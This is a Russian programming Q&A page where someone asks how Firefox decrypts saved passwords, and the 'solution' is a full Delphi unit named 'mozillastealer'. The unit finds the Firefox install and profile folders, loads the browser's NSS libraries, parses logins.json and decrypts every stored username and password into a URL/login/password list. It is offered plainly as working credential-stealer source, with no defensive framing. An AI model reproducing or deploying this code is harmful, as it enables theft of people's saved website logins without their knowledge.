Расшифровать пароли Firefox - C#
Формулировка задачи:
Подскажите пожалуйста, по какому алгоритму происходит расшифровка в Firefox, знаю что вся необходимая инфа лежит в файлах logins.json, key3.db и cert8.db, но самого алгоритма найти не могу
Решение задачи: «Расшифровать пароли Firefox»
textual
Листинг программы
unit mozillastealer; interface uses windows; function getMozilla(): string; implementation var version, FireFoxPath: string; function GetFileList(const Path: String): string; var a: Cardinal; fa: _WIN32_FIND_DATAA; begin result:=''; TRY a:=FindFirstFile(PansiChar(path+PChar('\*.*')),fa); while FindNextFile(a,fa) do result:=result+fa.cFileName+#13#10; EXCEPT END; end; procedure GetFFInfos; begin FireFoxPath:=''; TRY if pos('Mozilla Firefox', GetFileList('c:\Program Files (x86)\'))<>0 then FireFoxPath:='C:\Program Files (x86)\Mozilla Firefox\'; if pos('Mozilla Firefox', GetFileList('c:\Program Files'))<>0 then FireFoxPath:='C:\Program Files\Mozilla Firefox\'; EXCEPT END; end; Function Splitter(Texto, Delimitador: String; Indice: integer): string; var DelimiPos, i: integer; begin for i:= 1 to indice do begin DelimiPos:= pos(Delimitador,Texto); if DelimiPos <> 0 then Delete(Texto, 1, DelimiPos + length(Delimitador) -1); end; DelimiPos:= pos(Delimitador,Texto); if DelimiPos <> 0 then Texto:= Copy(Texto,1,delimipos -1); SetLength(Result, Length(Texto)); Result:= Texto; end; function Pars(T_, ForS, _T: string): string; var a, b:integer; begin Result := ''; if (T_='') or (ForS='') or (_T='') then Exit; a:=Pos(T_, ForS); if a=0 then Exit else a:=a+Length(T_); ForS:=Copy(ForS, a, Length(ForS)-a+1); b:=Pos(_T, ForS); if b>0 then Result:=Copy(ForS, 1, b - 1); end; Function GetFile(const FileName : AnsiString) : AnsiString; Var F : File; FSize : Longint; begin Result:=''; if GetFileAttributes(Pchar(FileName)) = DWORD($FFFFFFFF) then exit; FileMode:=0; AssignFile ( F, FileName); Reset(F, 1); FSize:=FileSize(F); SetLength(Result,FSize); BlockRead(F, Result[1],FSize); CloseFile(F); FileMode:=2; end; function ParseMozJSON(j: string): string; var data, it, ress: string; begin data:=GetFile(j); data:=Pars(',"logins":[{',data,'}],"disabledHosts":[],"version":1}'); while pos(',"hostname":"', data)<> 0 do begin it:= Pars(',"hostname":"', data, 'timesUsed":'); ress:=ress + copy(it, 1, pos('","',it)-1); delete(it, 0, pos('encryptedUsername":"', it)); ress:=ress + '<|>'+Pars('encryptedUsername":"',it,'","'); delete(it, 0, pos('encryptedPassword":"', it)); ress:=ress + '<|>'+Pars('encryptedPassword":"',it,'","')+#13#10; delete(data, 1, pos('timesUsed":',data)); end; result:=ress; end; function getMozilla(): string; type TSECItem = packed record SECItemType: dword; SECItemData: pchar; SECItemLen: dword; end; PSECItem = ^TSECItem; var NSSModule: THandle; hToken: THandle; NSS_Init: function(configdir: pchar): dword; cdecl; NSSBase64_DecodeBuffer: function(arenaOpt: pointer; outItemOpt: PSECItem; inStr: pchar; inLen: dword): dword; cdecl; PK11_GetInternalKeySlot: function: pointer; cdecl; PK11_Authenticate: function(slot: pointer; loadCerts: boolean; wincx: pointer): dword; cdecl; PK11SDR_Decrypt: function(data: PSECItem; result: PSECItem; cx: pointer): dword; cdecl; NSS_Shutdown: procedure; cdecl; PK11_FreeSlot: procedure(slot: pointer); cdecl; ProfilePath: array [0..MAX_PATH] of char; ProfilePathLen: dword; FirefoxProfilePath: pchar; MainProfile: array [0..MAX_PATH] of char; MainProfilePath: pchar; EncryptedSECItem: TSECItem; DecryptedSECItem: TSECItem; KeySlot: pointer; i:integer; username, password: string; V: Extended; buffer, huyufer: string; a: Cardinal; fa: _WIN32_FIND_DATAA; begin TRY try GetFFInfos; except end; try if FireFoxPath = '' then exit; except end; try LoadLibrary(pchar(FirefoxPath + 'mozglue.dll')); except end; try LoadLibrary(pchar(FirefoxPath + 'mozcrt19.dll')); except end; try LoadLibrary(pchar(FirefoxPath + 'mozutils.dll')); except end; try LoadLibrary(pchar(FirefoxPath + 'nspr4.dll')); except end; try LoadLibrary(pchar(FirefoxPath + 'plc4.dll')); except end; try LoadLibrary(pchar(FirefoxPath + 'plds4.dll')); except end; try LoadLibrary(pchar(FirefoxPath + 'nssutil3.dll')); except end; try NSSModule := LoadLibrary(pchar(FirefoxPath + 'nss3.dll')); except end; try @NSS_Init := GetProcAddress(NSSModule, pchar('NSS_Init')); except end; try @NSSBase64_DecodeBuffer := GetProcAddress(NSSModule, pchar('NSSBase64_DecodeBuffer')); except end; try @PK11_GetInternalKeySlot := GetProcAddress(NSSModule, pchar('PK11_GetInternalKeySlot')); except end; try @PK11_Authenticate := GetProcAddress(NSSModule, pchar('PK11_Authenticate')); except end; try @PK11SDR_Decrypt := GetProcAddress(NSSModule, pchar('PK11SDR_Decrypt')); except end; try @NSS_Shutdown := GetProcAddress(NSSModule, pchar('NSS_Shutdown')); except end; try @PK11_FreeSlot := GetProcAddress(NSSModule, pchar('PK11_FreeSlot')); except end; try OpenProcessToken(GetCurrentProcess, TOKEN_QUERY, hToken); except end; try ProfilePathLen := MAX_PATH; except end; try ZeroMemory(@ProfilePath, MAX_PATH); except end; try GetEnvironmentVariable('APPDATA', ProfilePath, ProfilePathLen); except end; try FirefoxProfilePath := pchar(profilePath +'\Mozilla\Firefox\profiles.ini'); except end; try GetPrivateProfileString('Profile0', 'Path', '', MainProfile, MAX_PATH, FirefoxProfilePath); except end; a:=FindFirstFile(PansiChar(profilePath + '\Mozilla\Firefox\Profiles\'+PChar('\*.*')),fa); while FindNextFile(a,fa) do if GetFileAttributes(PChar(profilePath + '\Mozilla\Firefox\Profiles\'+fa.cFileName+'\logins.json')) <> DWORD($FFFFFFFF) then try if NSS_Init(pchar(profilePath + '\Mozilla\Firefox\' + mainProfile)) = 0 then begin KeySlot := PK11_GetInternalKeySlot; if KeySlot <> nil then begin if PK11_Authenticate(KeySlot, True, nil) = 0 then begin huyufer:=ParseMozJSON(PChar(profilePath + '\Mozilla\Firefox\Profiles\'+fa.cFileName+'\logins.json')); while pos(#13#10, huyufer)<>0 do BEGIN buffer:=copy(huyufer, 0, pos(#13#10, huyufer)); delete(huyufer, 1, pos(#13#10, huyufer)+1); ZeroMemory(@EncryptedSECItem, SizeOf(EncryptedSECItem)); ZeroMemory(@DecryptedSECItem, SizeOf(DecryptedSECItem)); result := result + 'URL:'+#$9+Splitter(buffer, '<|>', 0) + #13#10; username:= Splitter(buffer, '<|>', 1); Password := Splitter(buffer, '<|>', 2); NSSBase64_DecodeBuffer(nil, @EncryptedSECItem, pchar(Username), Length(Username)); PK11SDR_Decrypt(@EncryptedSECItem, @DecryptedSECItem, nil); Result := result + 'LOG:'+#$9+DecryptedSECItem.SECItemData + #13#10; ZeroMemory(@EncryptedSECItem, SizeOf(EncryptedSECItem)); ZeroMemory(@DecryptedSECItem, SizeOf(DecryptedSECItem)); NSSBase64_DecodeBuffer(nil, @EncryptedSECItem, pchar(Password), Length(Password)); PK11SDR_Decrypt(@EncryptedSECItem, @DecryptedSECItem, nil); Result := result + 'PWD:'+#$9+DecryptedSECItem.SECItemData + #13#10+ #13#10; END; end else result:= result + ''; PK11_FreeSlot(KeySlot); end else result:= result + ''; NSS_Shutdown; end else result:= result + ''; except end; EXCEPT END; end; end.
ИИ поможет Вам:
- решить любую задачу по программированию
- объяснить код
- расставить комментарии в коде
- и т.д